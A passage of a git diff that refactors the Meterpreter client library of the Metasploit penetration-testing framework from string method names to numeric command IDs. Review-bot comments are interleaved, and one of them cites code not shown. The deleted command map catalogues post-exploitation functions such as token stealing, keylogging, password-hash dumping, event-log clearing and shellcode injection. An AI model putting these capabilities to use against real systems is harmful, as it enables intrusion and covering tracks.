   def initialize(client)
     super(client, 'unhook')
 
@@ -30,11 +34,11 @@ def initialize(client)
   end
 
   def unhook_pe
-    request = Packet.create_request('unhook_pe')
+    request = Packet.create_request(COMMAND_ID_UNHOOK_PE)
     response = client.send_request(request)
     response_code = response.get_tlv_value(TLV_TYPE_UNHOOK_ERROR_CODE)
 
-    raise Exception, "Did not get ERROR_SUCCESS back!" if response_code != UNHOOK_ERROR_SUCCESS
+    raise Exception, 'Did not get ERROR_SUCCESS back!' if response_code != UNHOOK_ERROR_SUCCESS
 
     return 0, response_code, nil
   end
diff --git a/lib/rex/post/meterpreter/extensions/winpmem/tlv.rb b/lib/rex/post/meterpreter/extensions/winpmem/tlv.rb
index 6c455e04ea48f..099ec10c823e3 100644
--- a/lib/rex/post/meterpreter/extensions/winpmem/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/winpmem/tlv.rb
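Review bot: `self.extension_id` in the unhook.rb hunk returns `EXTENSION_ID_UNOOK`, but the constant the tlv.rb hunk in this same diff defines is `EXTENSION_ID_UNHOOK`, so the first call raises NameError instead of returning the extension id; the line should read `EXTENSION_ID_UNHOOK`. The parallel winpmem hunk spells its constant correctly, which suggests a spec that calls `extension_id` on every extension class would have caught this before merge. The Unhook class continues outside the hunk.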
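Review bot: The rewritten line `raise Exception, 'Did not get ERROR_SUCCESS back!'` only changes the quoting and still raises the root `Exception`, which a plain `rescue` (StandardError) in any caller will not catch, so a failed unhook request can unwind past the console's error handling instead of being reported; `raise 'Did not get ERROR_SUCCESS back!'` (a RuntimeError) or a project error class is the safer form. The same pattern survives in the winpmem.rb hunk at -42 (`raise Exception, 'We did not get a channel back!'`). `unhook_pe` also discards the `response_code` it already fetched on the failure path; including it in the message would help triage, e.g. `raise "unhook_pe failed with error code #{response_code}" if response_code != UNHOOK_ERROR_SUCCESS`.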
@@ -4,8 +4,16 @@ module Post
 module Meterpreter
 module Extensions
 module Winpmem
-  TLV_TYPE_WINPMEM_ERROR_CODE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1)
-  TLV_TYPE_WINPMEM_MEMORY_SIZE = TLV_META_TYPE_QWORD | (TLV_EXTENSIONS + 2)
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_WINPMEM = 7000
+
+# Associated command ids
+COMMAND_ID_WINPMEM_DUMP_RAM = EXTENSION_ID_WINPMEM + 1
+
+TLV_TYPE_WINPMEM_ERROR_CODE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1)
+TLV_TYPE_WINPMEM_MEMORY_SIZE = TLV_META_TYPE_QWORD | (TLV_EXTENSIONS + 2)
+
 end
 end
 end
diff --git a/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb b/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb
index 4e9173190fc9e..1e467a9c37ff1 100644
--- a/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb
+++ b/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb
@@ -20,6 +20,10 @@ class Winpmem < Extension
   WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL = 4
   WINPMEM_ERROR_UNKNOWN = 255
 
+  def self.extension_id
+    EXTENSION_ID_WINPMEM
+  end
+
   def initialize(client)
     super(client, 'winpmem')
 
@@ -33,7 +37,7 @@ def initialize(client)
   end
 
   def dump_ram
-    request = Packet.create_request('winpmem_dump_ram')
+    request = Packet.create_request(COMMAND_ID_WINPMEM_DUMP_RAM)
     response = client.send_request(request)
     response_code = response.get_tlv_value(TLV_TYPE_WINPMEM_ERROR_CODE)
 
@@ -42,10 +46,10 @@ def dump_ram
     memory_size = response.get_tlv_value(TLV_TYPE_WINPMEM_MEMORY_SIZE)
     channel_id = response.get_tlv_value(TLV_TYPE_CHANNEL_ID)
 
-    raise Exception, "We did not get a channel back!" if channel_id.nil?
+    raise Exception, 'We did not get a channel back!' if channel_id.nil?
 
     # Open the compressed Channel
-    channel = Rex::Post::Meterpreter::Channels::Pool.new(client, channel_id, "winpmem",
+    channel = Rex::Post::Meterpreter::Channels::Pool.new(client, channel_id, 'winpmem',
       CHANNEL_FLAG_SYNCHRONOUS | CHANNEL_FLAG_COMPRESS, response)
     return memory_size, response_code, channel
   end
diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb
index 83e8c2bcecc85..f46fa6a4cef3a 100644
--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -50,7 +50,7 @@ module Meterpreter
 # TLV Specific Types
 #
 TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
-TLV_TYPE_METHOD = TLV_META_TYPE_UINT | 1
+TLV_TYPE_COMMAND_ID = TLV_META_TYPE_UINT | 1
 TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
 TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
 TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
@@ -136,500 +136,6 @@ module Meterpreter GUID_SIZE = 16 NULL_GUID = "\x00" * GUID_SIZE -# -# Mapping of command strings to identifiers -# -# -COMMAND_ID_START_CORE = 0 -COMMAND_ID_START_STDAPI = 1000 -COMMAND_ID_START_PRIV = 2000 -COMMAND_ID_START_EXTAPI = 3000 -COMMAND_ID_START_SNIFFER = 4000 -COMMAND_ID_START_ANDROID = 5000 -COMMAND_ID_START_NETWORKPUG = 6000 -COMMAND_ID_START_WINPMEM = 7000 -COMMAND_ID_START_KIWI = 8000 -COMMAND_ID_START_APPAPI = 9000 -COMMAND_ID_START_UNHOOK = 10000 -COMMAND_ID_START_ESPIA = 11000 -COMMAND_ID_START_INCOGNITO = 12000 -COMMAND_ID_START_PYTHON = 13000 -COMMAND_ID_START_POWERSHELL = 14000 -COMMAND_ID_START_LANATTACKS = 15000 -COMMAND_ID_START_PEINJECTOR = 16000 -COMMAND_ID_START_MIMIKATZ = 17000 - -COMMAND_ID_MAP_CORE = { - 'core_channel_close' => COMMAND_ID_START_CORE + 1, - 'core_channel_eof' => COMMAND_ID_START_CORE + 2, - 'core_channel_interact' => COMMAND_ID_START_CORE + 3, - 'core_channel_open' => COMMAND_ID_START_CORE + 4, - 'core_channel_read' => COMMAND_ID_START_CORE + 5, - 'core_channel_seek' => COMMAND_ID_START_CORE + 6, - 'core_channel_tell' => COMMAND_ID_START_CORE + 7, - 'core_channel_write' => COMMAND_ID_START_CORE + 8, - 'core_console_write' => COMMAND_ID_START_CORE + 9, - 'core_enumextcmd' => COMMAND_ID_START_CORE + 10, - 'core_get_session_guid' => COMMAND_ID_START_CORE + 11, - 'core_loadlib' => COMMAND_ID_START_CORE + 12, - 'core_machine_id' => COMMAND_ID_START_CORE + 13, - 'core_migrate' => COMMAND_ID_START_CORE + 14, - 'core_native_arch' => COMMAND_ID_START_CORE + 15, - 'core_negotiate_tlv_encryption' => COMMAND_ID_START_CORE + 16, - 'core_patch_url' => COMMAND_ID_START_CORE + 17, - 'core_pivot_add' => COMMAND_ID_START_CORE + 18, - 'core_pivot_remove' => COMMAND_ID_START_CORE + 19, - 'core_pivot_session_died' => COMMAND_ID_START_CORE + 20, - 'core_set_session_guid' => COMMAND_ID_START_CORE + 21, - 'core_set_uuid' => COMMAND_ID_START_CORE + 22, - 'core_shutdown' => COMMAND_ID_START_CORE + 23, - 
'core_transport_add' => COMMAND_ID_START_CORE + 24, - 'core_transport_change' => COMMAND_ID_START_CORE + 25, - 'core_transport_getcerthash' => COMMAND_ID_START_CORE + 26, - 'core_transport_list' => COMMAND_ID_START_CORE + 27, - 'core_transport_next' => COMMAND_ID_START_CORE + 28, - 'core_transport_prev' => COMMAND_ID_START_CORE + 29, - 'core_transport_remove' => COMMAND_ID_START_CORE + 30, - 'core_transport_setcerthash' => COMMAND_ID_START_CORE + 31, - 'core_transport_set_timeouts' => COMMAND_ID_START_CORE + 32, - 'core_transport_sleep' => COMMAND_ID_START_CORE + 33, -} - -COMMAND_ID_MAP_STDAPI = { - 'stdapi_fs_chdir' => COMMAND_ID_START_STDAPI + 1, - 'stdapi_fs_chmod' => COMMAND_ID_START_STDAPI + 2, - 'stdapi_fs_delete_dir' => COMMAND_ID_START_STDAPI + 3, - 'stdapi_fs_delete_file' => COMMAND_ID_START_STDAPI + 4, - 'stdapi_fs_file_copy' => COMMAND_ID_START_STDAPI + 5, - 'stdapi_fs_file_expand_path' => COMMAND_ID_START_STDAPI + 6, - 'stdapi_fs_file_move' => COMMAND_ID_START_STDAPI + 7, - 'stdapi_fs_getwd' => COMMAND_ID_START_STDAPI + 8, - 'stdapi_fs_ls' => COMMAND_ID_START_STDAPI + 9, - 'stdapi_fs_md5' => COMMAND_ID_START_STDAPI + 10, - 'stdapi_fs_mkdir' => COMMAND_ID_START_STDAPI + 11, - 'stdapi_fs_mount_show' => COMMAND_ID_START_STDAPI + 12, - 'stdapi_fs_search' => COMMAND_ID_START_STDAPI + 13, - 'stdapi_fs_separator' => COMMAND_ID_START_STDAPI + 14, - 'stdapi_fs_sha1' => COMMAND_ID_START_STDAPI + 15, - 'stdapi_fs_stat' => COMMAND_ID_START_STDAPI + 16, - 'stdapi_net_config_add_route' => COMMAND_ID_START_STDAPI + 17, - 'stdapi_net_config_get_arp_table' => COMMAND_ID_START_STDAPI + 18, - 'stdapi_net_config_get_interfaces' => COMMAND_ID_START_STDAPI + 19, - 'stdapi_net_config_get_netstat' => COMMAND_ID_START_STDAPI + 20, - 'stdapi_net_config_get_proxy' => COMMAND_ID_START_STDAPI + 21, - 'stdapi_net_config_get_routes' => COMMAND_ID_START_STDAPI + 22, - 'stdapi_net_config_remove_route' => COMMAND_ID_START_STDAPI + 23, - 'stdapi_net_resolve_host' => 
COMMAND_ID_START_STDAPI + 24, - 'stdapi_net_resolve_hosts' => COMMAND_ID_START_STDAPI + 25, - 'stdapi_net_socket_tcp_shutdown' => COMMAND_ID_START_STDAPI + 26, - 'stdapi_net_tcp_channel_open' => COMMAND_ID_START_STDAPI + 27, - 'stdapi_railgun_api' => COMMAND_ID_START_STDAPI + 28, - 'stdapi_railgun_api_multi' => COMMAND_ID_START_STDAPI + 29, - 'stdapi_railgun_memread' => COMMAND_ID_START_STDAPI + 30, - 'stdapi_railgun_memwrite' => COMMAND_ID_START_STDAPI + 31, - 'stdapi_registry_check_key_exists' => COMMAND_ID_START_STDAPI + 32, - 'stdapi_registry_close_key' => COMMAND_ID_START_STDAPI + 33, - 'stdapi_registry_create_key' => COMMAND_ID_START_STDAPI + 34, - 'stdapi_registry_delete_key' => COMMAND_ID_START_STDAPI + 35, - 'stdapi_registry_delete_value' => COMMAND_ID_START_STDAPI + 36, - 'stdapi_registry_enum_key' => COMMAND_ID_START_STDAPI + 37, - 'stdapi_registry_enum_key_direct' => COMMAND_ID_START_STDAPI + 38, - 'stdapi_registry_enum_value' => COMMAND_ID_START_STDAPI + 39, - 'stdapi_registry_enum_value_direct' => COMMAND_ID_START_STDAPI + 40, - 'stdapi_registry_load_key' => COMMAND_ID_START_STDAPI + 41, - 'stdapi_registry_open_key' => COMMAND_ID_START_STDAPI + 42, - 'stdapi_registry_open_remote_key' => COMMAND_ID_START_STDAPI + 43, - 'stdapi_registry_query_class' => COMMAND_ID_START_STDAPI + 44, - 'stdapi_registry_query_value' => COMMAND_ID_START_STDAPI + 45, - 'stdapi_registry_query_value_direct' => COMMAND_ID_START_STDAPI + 46, - 'stdapi_registry_set_value' => COMMAND_ID_START_STDAPI + 47, - 'stdapi_registry_set_value_direct' => COMMAND_ID_START_STDAPI + 48, - 'stdapi_registry_unload_key' => COMMAND_ID_START_STDAPI + 49, - 'stdapi_sys_config_driver_list' => COMMAND_ID_START_STDAPI + 50, - 'stdapi_sys_config_drop_token' => COMMAND_ID_START_STDAPI + 51, - 'stdapi_sys_config_getenv' => COMMAND_ID_START_STDAPI + 52, - 'stdapi_sys_config_getprivs' => COMMAND_ID_START_STDAPI + 53, - 'stdapi_sys_config_getsid' => COMMAND_ID_START_STDAPI + 54, - 'stdapi_sys_config_getuid' 
=> COMMAND_ID_START_STDAPI + 55, - 'stdapi_sys_config_localtime' => COMMAND_ID_START_STDAPI + 56, - 'stdapi_sys_config_rev2self' => COMMAND_ID_START_STDAPI + 57, - 'stdapi_sys_config_steal_token' => COMMAND_ID_START_STDAPI + 58, - 'stdapi_sys_config_sysinfo' => COMMAND_ID_START_STDAPI + 59, - 'stdapi_sys_eventlog_clear' => COMMAND_ID_START_STDAPI + 60, - 'stdapi_sys_eventlog_close' => COMMAND_ID_START_STDAPI + 61, - 'stdapi_sys_eventlog_numrecords' => COMMAND_ID_START_STDAPI + 62, - 'stdapi_sys_eventlog_oldest' => COMMAND_ID_START_STDAPI + 63, - 'stdapi_sys_eventlog_open' => COMMAND_ID_START_STDAPI + 64, - 'stdapi_sys_eventlog_read' => COMMAND_ID_START_STDAPI + 65, - 'stdapi_sys_power_exitwindows' => COMMAND_ID_START_STDAPI + 66, - 'stdapi_sys_process_attach' => COMMAND_ID_START_STDAPI + 67, - 'stdapi_sys_process_close' => COMMAND_ID_START_STDAPI + 68, - 'stdapi_sys_process_execute' => COMMAND_ID_START_STDAPI + 69, - 'stdapi_sys_process_get_info' => COMMAND_ID_START_STDAPI + 70, - 'stdapi_sys_process_get_processes' => COMMAND_ID_START_STDAPI + 71, - 'stdapi_sys_process_getpid' => COMMAND_ID_START_STDAPI + 72, - 'stdapi_sys_process_image_get_images' => COMMAND_ID_START_STDAPI + 73, - 'stdapi_sys_process_image_get_proc_address' => COMMAND_ID_START_STDAPI + 74, - 'stdapi_sys_process_image_load' => COMMAND_ID_START_STDAPI + 75, - 'stdapi_sys_process_image_unload' => COMMAND_ID_START_STDAPI + 76, - 'stdapi_sys_process_kill' => COMMAND_ID_START_STDAPI + 77, - 'stdapi_sys_process_memory_allocate' => COMMAND_ID_START_STDAPI + 78, - 'stdapi_sys_process_memory_free' => COMMAND_ID_START_STDAPI + 79, - 'stdapi_sys_process_memory_lock' => COMMAND_ID_START_STDAPI + 80, - 'stdapi_sys_process_memory_protect' => COMMAND_ID_START_STDAPI + 81, - 'stdapi_sys_process_memory_query' => COMMAND_ID_START_STDAPI + 82, - 'stdapi_sys_process_memory_read' => COMMAND_ID_START_STDAPI + 83, - 'stdapi_sys_process_memory_unlock' => COMMAND_ID_START_STDAPI + 84, - 'stdapi_sys_process_memory_write' 
=> COMMAND_ID_START_STDAPI + 85, - 'stdapi_sys_process_thread_close' => COMMAND_ID_START_STDAPI + 86, - 'stdapi_sys_process_thread_create' => COMMAND_ID_START_STDAPI + 87, - 'stdapi_sys_process_thread_get_threads' => COMMAND_ID_START_STDAPI + 88, - 'stdapi_sys_process_thread_open' => COMMAND_ID_START_STDAPI + 89, - 'stdapi_sys_process_thread_query_regs' => COMMAND_ID_START_STDAPI + 90, - 'stdapi_sys_process_thread_resume' => COMMAND_ID_START_STDAPI + 91, - 'stdapi_sys_process_thread_set_regs' => COMMAND_ID_START_STDAPI + 92, - 'stdapi_sys_process_thread_suspend' => COMMAND_ID_START_STDAPI + 93, - 'stdapi_sys_process_thread_terminate' => COMMAND_ID_START_STDAPI + 94, - 'stdapi_sys_process_wait' => COMMAND_ID_START_STDAPI + 95, - 'stdapi_ui_desktop_enum' => COMMAND_ID_START_STDAPI + 96, - 'stdapi_ui_desktop_get' => COMMAND_ID_START_STDAPI + 97, - 'stdapi_ui_desktop_screenshot' => COMMAND_ID_START_STDAPI + 98, - 'stdapi_ui_desktop_set' => COMMAND_ID_START_STDAPI + 99, - 'stdapi_ui_enable_keyboard' => COMMAND_ID_START_STDAPI + 100, - 'stdapi_ui_enable_mouse' => COMMAND_ID_START_STDAPI + 101, - 'stdapi_ui_get_idle_time' => COMMAND_ID_START_STDAPI + 102, - 'stdapi_ui_get_keys_utf8' => COMMAND_ID_START_STDAPI + 103, - 'stdapi_ui_send_keyevent' => COMMAND_ID_START_STDAPI + 104, - 'stdapi_ui_send_keys' => COMMAND_ID_START_STDAPI + 105, - 'stdapi_ui_send_mouse' => COMMAND_ID_START_STDAPI + 106, - 'stdapi_ui_start_keyscan' => COMMAND_ID_START_STDAPI + 107, - 'stdapi_ui_stop_keyscan' => COMMAND_ID_START_STDAPI + 108, - 'stdapi_ui_unlock_desktop' => COMMAND_ID_START_STDAPI + 109, - 'stdapi_webcam_audio_record' => COMMAND_ID_START_STDAPI + 110, - 'stdapi_webcam_get_frame' => COMMAND_ID_START_STDAPI + 111, - 'stdapi_webcam_list' => COMMAND_ID_START_STDAPI + 112, - 'stdapi_webcam_start' => COMMAND_ID_START_STDAPI + 113, - 'stdapi_webcam_stop' => COMMAND_ID_START_STDAPI + 114, -} - -COMMAND_ID_MAP_ANDROID = { - 'android_activity_start' => COMMAND_ID_START_ANDROID + 1, - 
'android_check_root' => COMMAND_ID_START_ANDROID + 2, - 'android_device_shutdown' => COMMAND_ID_START_ANDROID + 3, - 'android_dump_calllog' => COMMAND_ID_START_ANDROID + 4, - 'android_dump_contacts' => COMMAND_ID_START_ANDROID + 5, - 'android_dump_sms' => COMMAND_ID_START_ANDROID + 6, - 'android_geolocate' => COMMAND_ID_START_ANDROID + 7, - 'android_hide_app_icon' => COMMAND_ID_START_ANDROID + 8, - 'android_interval_collect' => COMMAND_ID_START_ANDROID + 9, - 'android_send_sms' => COMMAND_ID_START_ANDROID + 10, - 'android_set_audio_mode' => COMMAND_ID_START_ANDROID + 11, - 'android_set_wallpaper' => COMMAND_ID_START_ANDROID + 12, - 'android_sqlite_query' => COMMAND_ID_START_ANDROID + 13, - 'android_wakelock' => COMMAND_ID_START_ANDROID + 14, - 'android_wlan_geolocate' => COMMAND_ID_START_ANDROID + 15, -} - -COMMAND_ID_MAP_APPAPI = { - 'appapi_app_install' => COMMAND_ID_START_APPAPI + 1, - 'appapi_app_list' => COMMAND_ID_START_APPAPI + 2, - 'appapi_app_run' => COMMAND_ID_START_APPAPI + 3, - 'appapi_app_uninstall' => COMMAND_ID_START_APPAPI + 4, -} - -COMMAND_ID_MAP_WINPMEM = { - 'winpmem_dump_ram' => COMMAND_ID_START_WINPMEM + 1, -} - -COMMAND_ID_MAP_ESPIA = { - 'espia_image_get_dev_screen' => COMMAND_ID_START_ESPIA + 1, -} - -COMMAND_ID_MAP_EXTAPI = { - 'extapi_adsi_domain_query' => COMMAND_ID_START_EXTAPI + 1, - 'extapi_clipboard_get_data' => COMMAND_ID_START_EXTAPI + 2, - 'extapi_clipboard_monitor_dump' => COMMAND_ID_START_EXTAPI + 3, - 'extapi_clipboard_monitor_pause' => COMMAND_ID_START_EXTAPI + 4, - 'extapi_clipboard_monitor_purge' => COMMAND_ID_START_EXTAPI + 5, - 'extapi_clipboard_monitor_resume' => COMMAND_ID_START_EXTAPI + 6, - 'extapi_clipboard_monitor_start' => COMMAND_ID_START_EXTAPI + 7, - 'extapi_clipboard_monitor_stop' => COMMAND_ID_START_EXTAPI + 8, - 'extapi_clipboard_set_data' => COMMAND_ID_START_EXTAPI + 9, - 'extapi_ntds_parse' => COMMAND_ID_START_EXTAPI + 10, - 'extapi_pageant_send_query' => COMMAND_ID_START_EXTAPI + 11, - 
'extapi_service_control' => COMMAND_ID_START_EXTAPI + 12, - 'extapi_service_enum' => COMMAND_ID_START_EXTAPI + 13, - 'extapi_service_query' => COMMAND_ID_START_EXTAPI + 14, - 'extapi_window_enum' => COMMAND_ID_START_EXTAPI + 15, - 'extapi_wmi_query' => COMMAND_ID_START_EXTAPI + 16, -} - -COMMAND_ID_MAP_INCOGNITO = { - 'incognito_add_group_user' => COMMAND_ID_START_INCOGNITO + 1, - 'incognito_add_localgroup_user' => COMMAND_ID_START_INCOGNITO + 2, - 'incognito_add_user' => COMMAND_ID_START_INCOGNITO + 3, - 'incognito_impersonate_token' => COMMAND_ID_START_INCOGNITO + 4, - 'incognito_list_tokens' => COMMAND_ID_START_INCOGNITO + 5, - 'incognito_snarf_hashes' => COMMAND_ID_START_INCOGNITO + 6, -} - -COMMAND_ID_MAP_KIWI = { - 'kiwi_exec_cmd' => COMMAND_ID_START_KIWI + 1, -} - -COMMAND_ID_MAP_LANATTACKS = { - 'lanattacks_add_tftp_file' => COMMAND_ID_START_LANATTACKS + 1, - 'lanattacks_dhcp_log' => COMMAND_ID_START_LANATTACKS + 2, - 'lanattacks_reset_dhcp' => COMMAND_ID_START_LANATTACKS + 3, - 'lanattacks_reset_tftp' => COMMAND_ID_START_LANATTACKS + 4, - 'lanattacks_set_dhcp_option' => COMMAND_ID_START_LANATTACKS + 5, - 'lanattacks_start_dhcp' => COMMAND_ID_START_LANATTACKS + 6, - 'lanattacks_start_tftp' => COMMAND_ID_START_LANATTACKS + 7, - 'lanattacks_stop_dhcp' => COMMAND_ID_START_LANATTACKS + 8, - 'lanattacks_stop_tftp' => COMMAND_ID_START_LANATTACKS + 9, -} - -COMMAND_ID_MAP_MIMIKATZ = { - 'mimikatz_custom_command' => COMMAND_ID_START_MIMIKATZ + 1, -} - -COMMAND_ID_MAP_NETWORKPUG = { - 'networkpug_start' => COMMAND_ID_START_NETWORKPUG + 1, - 'networkpug_stop' => COMMAND_ID_START_NETWORKPUG + 2, -} - -COMMAND_ID_MAP_PEINJECTOR = { - 'peinjector_inject_shellcode' => COMMAND_ID_START_PEINJECTOR + 1, -} - -COMMAND_ID_MAP_POWERSHELL = { - 'powershell_assembly_load' => COMMAND_ID_START_POWERSHELL + 1, - 'powershell_execute' => COMMAND_ID_START_POWERSHELL + 2, - 'powershell_session_remove' => COMMAND_ID_START_POWERSHELL + 3, - 'powershell_shell' => 
COMMAND_ID_START_POWERSHELL + 4, -} - -COMMAND_ID_MAP_PRIV = { - 'priv_elevate_getsystem' => COMMAND_ID_START_PRIV + 1, - 'priv_fs_blank_directory_mace' => COMMAND_ID_START_PRIV + 2, - 'priv_fs_blank_file_mace' => COMMAND_ID_START_PRIV + 3, - 'priv_fs_get_file_mace' => COMMAND_ID_START_PRIV + 4, - 'priv_fs_set_file_mace' => COMMAND_ID_START_PRIV + 5, - 'priv_fs_set_file_mace_from_file' => COMMAND_ID_START_PRIV + 6, - 'priv_passwd_get_sam_hashes' => COMMAND_ID_START_PRIV + 7, -} - -COMMAND_ID_MAP_PYTHON = { - 'python_execute' => COMMAND_ID_START_PYTHON + 1, - 'python_reset' => COMMAND_ID_START_PYTHON + 2, -} - -COMMAND_ID_MAP_SNIFFER = { - 'sniffer_capture_dump' => COMMAND_ID_START_SNIFFER + 1, - 'sniffer_capture_dump_read' => COMMAND_ID_START_SNIFFER + 2, - 'sniffer_capture_release' => COMMAND_ID_START_SNIFFER + 3, - 'sniffer_capture_start' => COMMAND_ID_START_SNIFFER + 4, - 'sniffer_capture_stats' => COMMAND_ID_START_SNIFFER + 5, - 'sniffer_capture_stop' => COMMAND_ID_START_SNIFFER + 6, - 'sniffer_interfaces' => COMMAND_ID_START_SNIFFER + 7, - } - -COMMAND_ID_MAP_UNHOOK = { - 'unhook_pe' => COMMAND_ID_START_UNHOOK + 1, -} - -COMMAND_ID_MAP = [ - COMMAND_ID_MAP_CORE, - COMMAND_ID_MAP_STDAPI, - COMMAND_ID_MAP_PRIV, - COMMAND_ID_MAP_EXTAPI, - COMMAND_ID_MAP_SNIFFER, - COMMAND_ID_MAP_ANDROID, - COMMAND_ID_MAP_NETWORKPUG, - COMMAND_ID_MAP_WINPMEM, - COMMAND_ID_MAP_KIWI, - COMMAND_ID_MAP_APPAPI, - COMMAND_ID_MAP_UNHOOK, - COMMAND_ID_MAP_ESPIA, - COMMAND_ID_MAP_INCOGNITO, - COMMAND_ID_MAP_PYTHON, - COMMAND_ID_MAP_POWERSHELL, - COMMAND_ID_MAP_LANATTACKS, - COMMAND_ID_MAP_PEINJECTOR, - COMMAND_ID_MAP_MIMIKATZ, -].inject({}) {|m1, m2| m1.merge(m2)} - -def self.generate_command_id_map_c - id_map = [ - COMMAND_ID_MAP_CORE, - COMMAND_ID_MAP_STDAPI, - COMMAND_ID_MAP_PRIV, - COMMAND_ID_MAP_EXTAPI, - COMMAND_ID_MAP_SNIFFER, - COMMAND_ID_MAP_WINPMEM, - COMMAND_ID_MAP_KIWI, - COMMAND_ID_MAP_UNHOOK, - COMMAND_ID_MAP_ESPIA, - COMMAND_ID_MAP_INCOGNITO, - COMMAND_ID_MAP_PYTHON, - 
COMMAND_ID_MAP_POWERSHELL, - COMMAND_ID_MAP_LANATTACKS, - COMMAND_ID_MAP_PEINJECTOR, - COMMAND_ID_MAP_MIMIKATZ, - ].inject({}) {|m1, m2| m1.merge(m2)} - - command_ids = id_map.map {|k, v| "#define COMMAND_ID_#{k.upcase} #{v}"} - %Q^ -/*! - * @file common_command_ids.h - * @brief Declarations of command ID values - * @description This file was generated #{Time.now.utc}. Do not modify directly. - */ -#ifndef _METERPRETER_SOURCE_COMMON_COMMAND_IDS_H -#define _METERPRETER_SOURCE_COMMON_COMMAND_IDS_H - -#{command_ids.join("\n")} - -#endif - ^ -end - -def self.generate_command_id_map_java - id_map = [ - COMMAND_ID_MAP_CORE, - COMMAND_ID_MAP_STDAPI, - ].inject({}) {|m1, m2| m1.merge(m2)} - command_ids = id_map.map {|k, v| " public static final int #{k.upcase} = #{v};"} - %Q^ -package com.metasploit.meterpreter.command; - -/** - * All supported Command Identifiers - * - * @author Genereated by a tool @ #{Time.now.utc} - */ -public interface CommandId { -#{command_ids.join("\n")} -} - ^ -end - -def self.generate_command_id_map_php_lib(lib, id_map) - command_ids = id_map.map {|k, v| "define('COMMAND_ID_#{k.upcase}', #{v});"} - %Q^ -# --------------------------------------------------------------- -# --- THIS CONTENT WAS GENERATED BY A TOOL @ #{Time.now.utc} -# IDs for #{lib} -#{command_ids.join("\n")} -# --------------------------------------------------------------- - ^ -end - -def self.generate_command_id_map_php - %Q^ -#{self.generate_command_id_map_php_lib('metsrv', COMMAND_ID_MAP_CORE)} - -#{self.generate_command_id_map_php_lib('stdapi', COMMAND_ID_MAP_STDAPI)} - ^ -end - -def self.generate_command_id_map_python - id_map = [ - COMMAND_ID_MAP_CORE, - COMMAND_ID_MAP_STDAPI, - ].inject({}) {|m1, m2| m1.merge(m2)} - command_ids = id_map.map {|k, v| " (#{v}, '#{k.downcase}'),"} - %Q^ -# --------------------------------------------------------------- -# --- THIS CONTENT WAS GENERATED BY A TOOL @ #{Time.now.utc} -COMMAND_IDS = ( -#{command_ids.join("\n")} -) -# 
--------------------------------------------------------------- - ^ -end - -def self.generate_command_id_map_python_extension - id_map = [ - COMMAND_ID_MAP_CORE, - COMMAND_ID_MAP_STDAPI, - COMMAND_ID_MAP_PRIV, - COMMAND_ID_MAP_EXTAPI, - COMMAND_ID_MAP_SNIFFER, - COMMAND_ID_MAP_WINPMEM, - COMMAND_ID_MAP_KIWI, - COMMAND_ID_MAP_UNHOOK, - COMMAND_ID_MAP_ESPIA, - COMMAND_ID_MAP_INCOGNITO, - COMMAND_ID_MAP_PYTHON, - COMMAND_ID_MAP_POWERSHELL, - COMMAND_ID_MAP_LANATTACKS, - COMMAND_ID_MAP_PEINJECTOR, - COMMAND_ID_MAP_MIMIKATZ, - ].inject({}) {|m1, m2| m1.merge(m2)} - command_ids = id_map.map {|k, v| "COMMAND_ID_#{k.upcase} = #{v}"} - %Q^ -# --------------------------------------------------------------- -# --- THIS CONTENT WAS GENERATED BY A TOOL @ #{Time.now.utc} - -#{command_ids.join("\n")} - -# --------------------------------------------------------------- - ^ -end - -def self.generate_command_id_map_csharp - id_map = [ - COMMAND_ID_MAP_CORE, - COMMAND_ID_MAP_STDAPI, - COMMAND_ID_MAP_PRIV, - COMMAND_ID_MAP_EXTAPI, - COMMAND_ID_MAP_SNIFFER, - COMMAND_ID_MAP_WINPMEM, - COMMAND_ID_MAP_KIWI, - COMMAND_ID_MAP_UNHOOK, - COMMAND_ID_MAP_ESPIA, - COMMAND_ID_MAP_INCOGNITO, - COMMAND_ID_MAP_PYTHON, - COMMAND_ID_MAP_POWERSHELL, - COMMAND_ID_MAP_LANATTACKS, - COMMAND_ID_MAP_PEINJECTOR, - COMMAND_ID_MAP_MIMIKATZ, - ].inject({}) {|m1, m2| m1.merge(m2)} - command_ids = id_map.map {|k, v| "#{k.split('_').map(&:capitalize).join} = #{v},"} - %Q^ -/// -// This content was generated by a tool @ #{Time.now.utc} -/// -namespace MSF.Powershell.Meterpreter -{ - public enum CommandId - { - #{command_ids.join("\n ")} - } -} - ^ -end - -def self.method_string_to_command_id(method_string) - unless COMMAND_ID_MAP.include?(method_string) - raise ArgumentError, "Unknown Packet command method string: #{method_string}, please report this to the Metasploit team." 
- end - - COMMAND_ID_MAP[method_string] -end - -def self.command_id_to_method_string(method_int) - value = COMMAND_ID_MAP.key(method_int) - - if value.nil? - raise ArgumentError, "Unknown Packet command method integer: #{}, please report this to the Metasploit team." - end - - value -end - - ### # # Base TLV (Type-Length-Value) class @@ -683,7 +189,7 @@ def inspect when PACKET_TYPE_REQUEST; "Request" when PACKET_TYPE_RESPONSE; "Response" when TLV_TYPE_REQUEST_ID; "REQUEST-ID" - when TLV_TYPE_METHOD; "METHOD" + when TLV_TYPE_COMMAND_ID; "COMMAND-ID" when TLV_TYPE_RESULT; "RESULT" when TLV_TYPE_EXCEPTION; "EXCEPTION" when TLV_TYPE_STRING; "STRING" @@ -768,9 +274,7 @@ def inspect else tlvs_inspect = "meta=#{meta.ljust 10} value=#{val}" end - extra = '' - extra += " method=#{self.method}" if self.class.to_s =~ /Packet/ - "#<#{self.class} type=#{stype}#{extra} #{tlvs_inspect}>" + "#<#{self.class} type=#{stype} #{tlvs_inspect}>" end ## @@ -1390,8 +894,7 @@ def xor_bytes(xor_key, bytes) # Checks to see if the packet is a response. # def response? - return ((self.type == PACKET_TYPE_RESPONSE) || - 